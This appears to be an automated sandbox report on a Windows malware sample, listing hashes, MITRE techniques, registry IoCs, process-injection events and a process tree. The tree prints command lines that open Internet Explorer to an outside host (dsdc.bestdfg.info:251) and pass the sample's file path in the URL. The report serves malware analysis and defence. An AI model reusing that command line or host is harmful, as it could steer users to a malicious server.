37226c2a7bdf8087f947c8303539cd4d17d933a08ee196413aaea78a2604c7f5

Analysis

max time kernel
93s
max time network
149s
platform
windows10-2004_x64
resource
win10v2004-20220901-en
resource tags

arch:x64arch:x86image:win10v2004-20220901-enlocale:en-usos:windows10-2004-x64system
submitted
19/09/2022, 12:39

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

37226c2a7bdf8087f947c8303539cd4d17d933a08ee196413aaea78a2604c7f5.exe
Size

113KB
MD5

130d7f2db76e189a07d0a27dcca40cea
SHA1

c004862bc5768ed546cce7fa0c9d4723f8a68498
SHA256

37226c2a7bdf8087f947c8303539cd4d17d933a08ee196413aaea78a2604c7f5
SHA512

6421c1d7ebda320541bcec1c23300221798c963b800b6d172f278b49ffaae32a2abe82cf49c98d88d2b853cdbe443aded017e670c207a7ff37dead2275e51270
SSDEEP

3072:34eYZ4+1JXJJO1sIOZFe4Cp+JIpNVd/C290bA:I5O8KSIkFe4qpNVc5k

Score

7^/10

Malware Config

Signatures

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Control Panel\International\Geo\Nation	37226c2a7bdf8087f947c8303539cd4d17d933a08ee196413aaea78a2604c7f5.exe

Loads dropped DLL 13 IoCs

pid	Process
3632	37226c2a7bdf8087f947c8303539cd4d17d933a08ee196413aaea78a2604c7f5.exe
3632	37226c2a7bdf8087f947c8303539cd4d17d933a08ee196413aaea78a2604c7f5.exe
3632	37226c2a7bdf8087f947c8303539cd4d17d933a08ee196413aaea78a2604c7f5.exe
3632	37226c2a7bdf8087f947c8303539cd4d17d933a08ee196413aaea78a2604c7f5.exe
3632	37226c2a7bdf8087f947c8303539cd4d17d933a08ee196413aaea78a2604c7f5.exe
3632	37226c2a7bdf8087f947c8303539cd4d17d933a08ee196413aaea78a2604c7f5.exe
3632	37226c2a7bdf8087f947c8303539cd4d17d933a08ee196413aaea78a2604c7f5.exe
3632	37226c2a7bdf8087f947c8303539cd4d17d933a08ee196413aaea78a2604c7f5.exe
3632	37226c2a7bdf8087f947c8303539cd4d17d933a08ee196413aaea78a2604c7f5.exe
3632	37226c2a7bdf8087f947c8303539cd4d17d933a08ee196413aaea78a2604c7f5.exe
3632	37226c2a7bdf8087f947c8303539cd4d17d933a08ee196413aaea78a2604c7f5.exe
3632	37226c2a7bdf8087f947c8303539cd4d17d933a08ee196413aaea78a2604c7f5.exe
3632	37226c2a7bdf8087f947c8303539cd4d17d933a08ee196413aaea78a2604c7f5.exe

Suspicious use of SetThreadContext 1 IoCs

description	pid	Process	procid_target
PID 3632 set thread context of 2808	3632	37226c2a7bdf8087f947c8303539cd4d17d933a08ee196413aaea78a2604c7f5.exe	127

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Modifies Internet Explorer settings 1 TTPs 64 IoCs

adware spyware

Modify Registry

T1112

description	ioc	Process
Set value (data)	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = a0eb838f5accd801	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\SOFTWARE\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0"	IEXPLORE.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\SOFTWARE\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff720000001a000000f80400007f020000	IEXPLORE.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb0100000043e2eb2e51ccf149ab640c8bdb0d790600000000020000000000106600000001000020000000931914ab897f20649d8e2bed4eca7fe1305d017e0d4e58a011db38a75808fbb7000000000e8000000002000020000000b36526a28142115fc6cf7a785b152ee74f11bd652acf80dca3e83c743b296a952000000001d5c635503c3f2f7f779f987d610423a8b146e60daea160b4b11fa1bb9b011440000000b7d46596d77b14c2a9bd4b35efd9c7e23de4e8c3cfc5dc17397876514f85805eb7cd6cf233c338c15c85c0296378430cb1802a7ba508d0724c4a05499aa92c64	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateLowDateTime = "2536541647"	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateLowDateTime = "2566855216"	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateLowDateTime = "2627793003"	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateHighDateTime = "30985306"	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\SOFTWARE\Microsoft\Internet Explorer\Recovery\AdminActive\{C02B724E-384D-11ED-A0EE-62142853BA25} = "0"	IEXPLORE.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb0100000043e2eb2e51ccf149ab640c8bdb0d79060000000002000000000010660000000100002000000094228aee6b4f7355bc1b28c10c7af2f6f83b0184220e281b6ebc0b733dca99d4000000000e8000000002000020000000b0a2f36e655421fee1ed27028ca971d85246139bf5db85a47d42988adb58341d200000000855c9f99f62d54358f400884a0e871deb3e44a72a4b1749f75fb3b2a1d99a3440000000df1c2a0c5d5096f92dc5e1ad277f36ae09d82339bb54bf3a312eaa27f87bf4e31ad5c326c4e2b4ddf207b637577f9a1f0fa97ef65c97d7efb1c9dac73b059d0c	IEXPLORE.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = 20981e965accd801	IEXPLORE.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb0100000043e2eb2e51ccf149ab640c8bdb0d790600000000020000000000106600000001000020000000430bb888b30c5c3c47dd2e1e7d8c080642c4cb430a697399f4948f463abd6c55000000000e8000000002000020000000d7e6142ec48b4ed82798847c8f53a09785398b6d7f8d46eead9ca2c0f70772fe200000001c1e05dd8fccd459f5d19d1548136ff923363f9146b162e305dc22f126c01ec24000000030749e986340b491a341a295cdf013030c4cd4b3a5df9e181c8bcf1b4b559d9faece7a1b4fa48977fbf97442d08da419d1a5f49902a3d086b7d74c92e0b22868	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateHighDateTime = "30985306"	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Software\Microsoft\Internet Explorer\VersionManager	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastTTLLowDateTime = "1251635200"	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Software\Microsoft\Internet Explorer\Main	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Software\Microsoft\Internet Explorer\VersionManager	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Software\Microsoft\Internet Explorer\DomainSuggestion	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Software\Microsoft\Internet Explorer\Main	IEXPLORE.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = 708bd08c5accd801	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Software\Microsoft\Internet Explorer\Main	IEXPLORE.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = 4076498b5accd801	IEXPLORE.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = 204d81925accd801	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Software\Microsoft\Internet Explorer\VersionManager	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Software\Microsoft\Internet Explorer\VersionManager	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Software\Microsoft\Internet Explorer\Main	IEXPLORE.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = 4060b8875accd801	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateLowDateTime = "2494667827"	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateLowDateTime = "2500449891"	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Software\Microsoft\Internet Explorer\Main	IEXPLORE.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\SOFTWARE\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff680000001a000000ee0400007f020000	IEXPLORE.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb0100000043e2eb2e51ccf149ab640c8bdb0d7906000000000200000000001066000000010000200000007752cefa1f0cbdac16bf7ed0946e0de6736dc4e6af4710cb3d3f6aa89ff2f82b000000000e8000000002000020000000c3bef1874177b2d615e2f83b904a2d120e14dc9afa0244b6c7e014986434158d20000000e2f14c7ae41164c9acaf8e133252ec136de478a05e2ea0def49d4fef48ad0f1040000000fda858ccc79b2a182418d9c38cdb28fbc2dc9fdd3415767676e94e60e725e255d739ad60df346a4b4314ff8312ad5177989c6e164b8316e87a884df4dad910cd	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Software\Microsoft\Internet Explorer\Main	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateHighDateTime = "30985306"	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Software\Microsoft\Internet Explorer\VersionManager	IEXPLORE.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\SOFTWARE\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running"	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\SOFTWARE\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0"	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing	IEXPLORE.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb0100000043e2eb2e51ccf149ab640c8bdb0d790600000000020000000000106600000001000020000000ce5e18a2bd238547340fe6fe660093389608d86be1a0cca230dac02c8e2770bb000000000e8000000002000020000000cfd30a3767b9aad470781fdf6103a2d46f9c3c49a91136ef1e02097328f455b92000000000eacf5c0826bd2cde0cb6d42f4552a7bfb5c44ad0aa7d0456b8c7ddd91a873e400000005c2e48a6fedc13b459a33c822ce88cf7b2c5b39240dee8fb4faa2af07069ae6831b76b668bd0874c41b66854b7896c9823c89f12d89115e81552c8d0739debdb	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Software\Microsoft\Internet Explorer\Main	IEXPLORE.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = 808654945accd801	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Software\Microsoft\Internet Explorer\VersionManager	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NTPFirstRun = "1"	IEXPLORE.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\SOFTWARE\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff5800000000000000de04000065020000	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Software\Microsoft\Internet Explorer\Main	IEXPLORE.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\SOFTWARE\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff00000000000000008604000065020000	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Software\Microsoft\Internet Explorer\Main	IEXPLORE.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb0100000043e2eb2e51ccf149ab640c8bdb0d790600000000020000000000106600000001000020000000f6e1e1fb1602d676ebc62db62af5158ad4c19a2e9dd05b4b6e854e356735f543000000000e80000000020000200000002bf139d84b12dbc05c0b43c864246e25967e81f8f3950e52741716e92aee217b200000007b7e0d88d5a0786915e8acbabc6b08455f8c79f3c87cd27ee61e03b7aac9978a40000000d2348a1163a7c5f746f63d983821af4eb43e9782f88e609420c006e190b1b3b49294d8569b748aa1c9d1e993f771c38a17038bba0890f6ae240e5e1d377dd530	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Software\Microsoft\Internet Explorer\Main	IEXPLORE.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb0100000043e2eb2e51ccf149ab640c8bdb0d790600000000020000000000106600000001000020000000871843838339298cfe7b394528b872f620bf8cf24b8402b9bf5b0e1e1e9c75ef000000000e800000000200002000000042ccfd9848e8f5e11ce40ce5f750ad2863abe5dc81e13ec69d4072292dc556f920000000d12066f34006a6ecea60f918768c5221fefdb1d1b13fcc6f6fece7681ea0758a40000000c85cde0644d83bfd84072b21c940eac48e3a87ebb6bbb5cb97ab11b625b8bac02adbf624eeae27751cd70160de41ac7b60173b68ee59db320b1911173214d4d2	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Software\Microsoft\Internet Explorer\Main	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Software\Microsoft\Internet Explorer\VersionManager	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateLowDateTime = "2507322671"	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Software\Microsoft\Internet Explorer\Main	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateHighDateTime = "30985306"	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateHighDateTime = "30985306"	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastUpdateLowDateTime = "2494667827"	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Software\Microsoft\Internet Explorer\VersionManager	IEXPLORE.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb0100000043e2eb2e51ccf149ab640c8bdb0d790600000000020000000000106600000001000020000000a995d7abdebae5d70f8af870778256eba37ecab13b70ae5788f8b1fa162e935e000000000e80000000020000200000006cc263a8046b50e270b88925a1fa6cde25554b59a52f7aa7431e7f3d7f279e2d200000003e1a618be562e225ec1f590fba0c39e56a0139ad7416925a53706613893333024000000098f8a09c6db821006e6c1f3815793f2b576867dc64c7846be491c353aa80ddbbc063bea3cfc741aab7746e84f4498fd796e734363af8a8606e012f80e6259cc6	IEXPLORE.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = c05659845accd801	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Software\Microsoft\Internet Explorer\Main	IEXPLORE.EXE

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

pid	Process
3464	IEXPLORE.EXE

Suspicious use of FindShellTrayWindow 12 IoCs

pid	Process
3464	IEXPLORE.EXE
3464	IEXPLORE.EXE
3464	IEXPLORE.EXE
3464	IEXPLORE.EXE
3464	IEXPLORE.EXE
3464	IEXPLORE.EXE
3464	IEXPLORE.EXE
3464	IEXPLORE.EXE
3464	IEXPLORE.EXE
3464	IEXPLORE.EXE
3464	IEXPLORE.EXE
3464	IEXPLORE.EXE

Suspicious use of SetWindowsHookEx 50 IoCs

pid	Process
3464	IEXPLORE.EXE
3464	IEXPLORE.EXE
2984	IEXPLORE.EXE
2984	IEXPLORE.EXE
3464	IEXPLORE.EXE
3464	IEXPLORE.EXE
3120	IEXPLORE.EXE
3120	IEXPLORE.EXE
3464	IEXPLORE.EXE
3464	IEXPLORE.EXE
3888	IEXPLORE.EXE
3888	IEXPLORE.EXE
3464	IEXPLORE.EXE
3464	IEXPLORE.EXE
480	IEXPLORE.EXE
480	IEXPLORE.EXE
3464	IEXPLORE.EXE
3464	IEXPLORE.EXE
3120	IEXPLORE.EXE
3120	IEXPLORE.EXE
3464	IEXPLORE.EXE
3464	IEXPLORE.EXE
1988	IEXPLORE.EXE
1988	IEXPLORE.EXE
3464	IEXPLORE.EXE
3464	IEXPLORE.EXE
3888	IEXPLORE.EXE
3888	IEXPLORE.EXE
3464	IEXPLORE.EXE
3464	IEXPLORE.EXE
2248	IEXPLORE.EXE
2248	IEXPLORE.EXE
3464	IEXPLORE.EXE
3464	IEXPLORE.EXE
480	IEXPLORE.EXE
480	IEXPLORE.EXE
3464	IEXPLORE.EXE
3464	IEXPLORE.EXE
3324	IEXPLORE.EXE
3324	IEXPLORE.EXE
3464	IEXPLORE.EXE
3464	IEXPLORE.EXE
1988	IEXPLORE.EXE
1988	IEXPLORE.EXE
3464	IEXPLORE.EXE
3464	IEXPLORE.EXE
3980	IEXPLORE.EXE
3980	IEXPLORE.EXE
3980	IEXPLORE.EXE
3980	IEXPLORE.EXE

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 3632 wrote to memory of 3356	3632	37226c2a7bdf8087f947c8303539cd4d17d933a08ee196413aaea78a2604c7f5.exe	87
PID 3632 wrote to memory of 3356	3632	37226c2a7bdf8087f947c8303539cd4d17d933a08ee196413aaea78a2604c7f5.exe	87
PID 3632 wrote to memory of 3356	3632	37226c2a7bdf8087f947c8303539cd4d17d933a08ee196413aaea78a2604c7f5.exe	87
PID 3356 wrote to memory of 3464	3356	iexplore.exe	88
PID 3356 wrote to memory of 3464	3356	iexplore.exe	88
PID 3464 wrote to memory of 2984	3464	IEXPLORE.EXE	89
PID 3464 wrote to memory of 2984	3464	IEXPLORE.EXE	89
PID 3464 wrote to memory of 2984	3464	IEXPLORE.EXE	89
PID 3632 wrote to memory of 5056	3632	37226c2a7bdf8087f947c8303539cd4d17d933a08ee196413aaea78a2604c7f5.exe	90
PID 3632 wrote to memory of 5056	3632	37226c2a7bdf8087f947c8303539cd4d17d933a08ee196413aaea78a2604c7f5.exe	90
PID 3632 wrote to memory of 5056	3632	37226c2a7bdf8087f947c8303539cd4d17d933a08ee196413aaea78a2604c7f5.exe	90
PID 5056 wrote to memory of 856	5056	iexplore.exe	91
PID 5056 wrote to memory of 856	5056	iexplore.exe	91
PID 3464 wrote to memory of 3120	3464	IEXPLORE.EXE	92
PID 3464 wrote to memory of 3120	3464	IEXPLORE.EXE	92
PID 3464 wrote to memory of 3120	3464	IEXPLORE.EXE	92
PID 3632 wrote to memory of 4748	3632	37226c2a7bdf8087f947c8303539cd4d17d933a08ee196413aaea78a2604c7f5.exe	94
PID 3632 wrote to memory of 4748	3632	37226c2a7bdf8087f947c8303539cd4d17d933a08ee196413aaea78a2604c7f5.exe	94
PID 3632 wrote to memory of 4748	3632	37226c2a7bdf8087f947c8303539cd4d17d933a08ee196413aaea78a2604c7f5.exe	94
PID 4748 wrote to memory of 3112	4748	iexplore.exe	95
PID 4748 wrote to memory of 3112	4748	iexplore.exe	95
PID 3464 wrote to memory of 3888	3464	IEXPLORE.EXE	96
PID 3464 wrote to memory of 3888	3464	IEXPLORE.EXE	96
PID 3464 wrote to memory of 3888	3464	IEXPLORE.EXE	96
PID 3632 wrote to memory of 4124	3632	37226c2a7bdf8087f947c8303539cd4d17d933a08ee196413aaea78a2604c7f5.exe	97
PID 3632 wrote to memory of 4124	3632	37226c2a7bdf8087f947c8303539cd4d17d933a08ee196413aaea78a2604c7f5.exe	97
PID 3632 wrote to memory of 4124	3632	37226c2a7bdf8087f947c8303539cd4d17d933a08ee196413aaea78a2604c7f5.exe	97
PID 4124 wrote to memory of 1984	4124	iexplore.exe	98
PID 4124 wrote to memory of 1984	4124	iexplore.exe	98
PID 3464 wrote to memory of 480	3464	IEXPLORE.EXE	99
PID 3464 wrote to memory of 480	3464	IEXPLORE.EXE	99
PID 3464 wrote to memory of 480	3464	IEXPLORE.EXE	99
PID 3632 wrote to memory of 4696	3632	37226c2a7bdf8087f947c8303539cd4d17d933a08ee196413aaea78a2604c7f5.exe	100
PID 3632 wrote to memory of 4696	3632	37226c2a7bdf8087f947c8303539cd4d17d933a08ee196413aaea78a2604c7f5.exe	100
PID 3632 wrote to memory of 4696	3632	37226c2a7bdf8087f947c8303539cd4d17d933a08ee196413aaea78a2604c7f5.exe	100
PID 4696 wrote to memory of 4084	4696	iexplore.exe	101
PID 4696 wrote to memory of 4084	4696	iexplore.exe	101
PID 3632 wrote to memory of 4536	3632	37226c2a7bdf8087f947c8303539cd4d17d933a08ee196413aaea78a2604c7f5.exe	105
PID 3632 wrote to memory of 4536	3632	37226c2a7bdf8087f947c8303539cd4d17d933a08ee196413aaea78a2604c7f5.exe	105
PID 3632 wrote to memory of 4536	3632	37226c2a7bdf8087f947c8303539cd4d17d933a08ee196413aaea78a2604c7f5.exe	105
PID 4536 wrote to memory of 4404	4536	iexplore.exe	106
PID 4536 wrote to memory of 4404	4536	iexplore.exe	106
PID 3464 wrote to memory of 1988	3464	IEXPLORE.EXE	107
PID 3464 wrote to memory of 1988	3464	IEXPLORE.EXE	107
PID 3464 wrote to memory of 1988	3464	IEXPLORE.EXE	107
PID 3632 wrote to memory of 5032	3632	37226c2a7bdf8087f947c8303539cd4d17d933a08ee196413aaea78a2604c7f5.exe	109
PID 3632 wrote to memory of 5032	3632	37226c2a7bdf8087f947c8303539cd4d17d933a08ee196413aaea78a2604c7f5.exe	109
PID 3632 wrote to memory of 5032	3632	37226c2a7bdf8087f947c8303539cd4d17d933a08ee196413aaea78a2604c7f5.exe	109
PID 5032 wrote to memory of 3132	5032	iexplore.exe	110
PID 5032 wrote to memory of 3132	5032	iexplore.exe	110
PID 3632 wrote to memory of 1252	3632	37226c2a7bdf8087f947c8303539cd4d17d933a08ee196413aaea78a2604c7f5.exe	113
PID 3632 wrote to memory of 1252	3632	37226c2a7bdf8087f947c8303539cd4d17d933a08ee196413aaea78a2604c7f5.exe	113
PID 3632 wrote to memory of 1252	3632	37226c2a7bdf8087f947c8303539cd4d17d933a08ee196413aaea78a2604c7f5.exe	113
PID 1252 wrote to memory of 1448	1252	iexplore.exe	114
PID 1252 wrote to memory of 1448	1252	iexplore.exe	114
PID 3464 wrote to memory of 2248	3464	IEXPLORE.EXE	115
PID 3464 wrote to memory of 2248	3464	IEXPLORE.EXE	115
PID 3464 wrote to memory of 2248	3464	IEXPLORE.EXE	115
PID 3632 wrote to memory of 4560	3632	37226c2a7bdf8087f947c8303539cd4d17d933a08ee196413aaea78a2604c7f5.exe	116
PID 3632 wrote to memory of 4560	3632	37226c2a7bdf8087f947c8303539cd4d17d933a08ee196413aaea78a2604c7f5.exe	116
PID 3632 wrote to memory of 4560	3632	37226c2a7bdf8087f947c8303539cd4d17d933a08ee196413aaea78a2604c7f5.exe	116
PID 4560 wrote to memory of 4404	4560	iexplore.exe	117
PID 4560 wrote to memory of 4404	4560	iexplore.exe	117
PID 3632 wrote to memory of 4868	3632	37226c2a7bdf8087f947c8303539cd4d17d933a08ee196413aaea78a2604c7f5.exe	119

C:\Users\Admin\AppData\Local\Temp\37226c2a7bdf8087f947c8303539cd4d17d933a08ee196413aaea78a2604c7f5.exe
"C:\Users\Admin\AppData\Local\Temp\37226c2a7bdf8087f947c8303539cd4d17d933a08ee196413aaea78a2604c7f5.exe"
1⤵
- Checks computer location settings
- Loads dropped DLL
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:3632
- C:\Program Files (x86)\Internet Explorer\iexplore.exe
  "C:\Program Files (x86)\Internet Explorer\iexplore.exe" http://dsdc.bestdfg.info:251/?t=919&i=ie&a64852def0cd3372a256db34473567272b10e818=a64852def0cd3372a256db34473567272b10e818&uu=C:\Users\Admin\AppData\Local\Temp\37226c2a7bdf8087f947c8303539cd4d17d933a08ee196413aaea78a2604c7f5&a64852def0cd3372a256db34473567272b10e818
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3356
- - C:\Program Files\Internet Explorer\IEXPLORE.EXE
    "C:\Program Files\Internet Explorer\IEXPLORE.EXE" http://dsdc.bestdfg.info:251/?t=919&i=ie&a64852def0cd3372a256db34473567272b10e818=a64852def0cd3372a256db34473567272b10e818&uu=C:\Users\Admin\AppData\Local\Temp\37226c2a7bdf8087f947c8303539cd4d17d933a08ee196413aaea78a2604c7f5&a64852def0cd3372a256db34473567272b10e818
    3⤵
    - Modifies Internet Explorer settings
    - Suspicious behavior: GetForegroundWindowSpam
    - Suspicious use of FindShellTrayWindow
    - Suspicious use of SetWindowsHookEx
    - Suspicious use of WriteProcessMemory
    PID:3464
  - - C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
      "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:3464 CREDAT:17410 /prefetch:2
      4⤵
      Modifies Internet Explorer settings
      Suspicious use of SetWindowsHookEx
      PID:2984
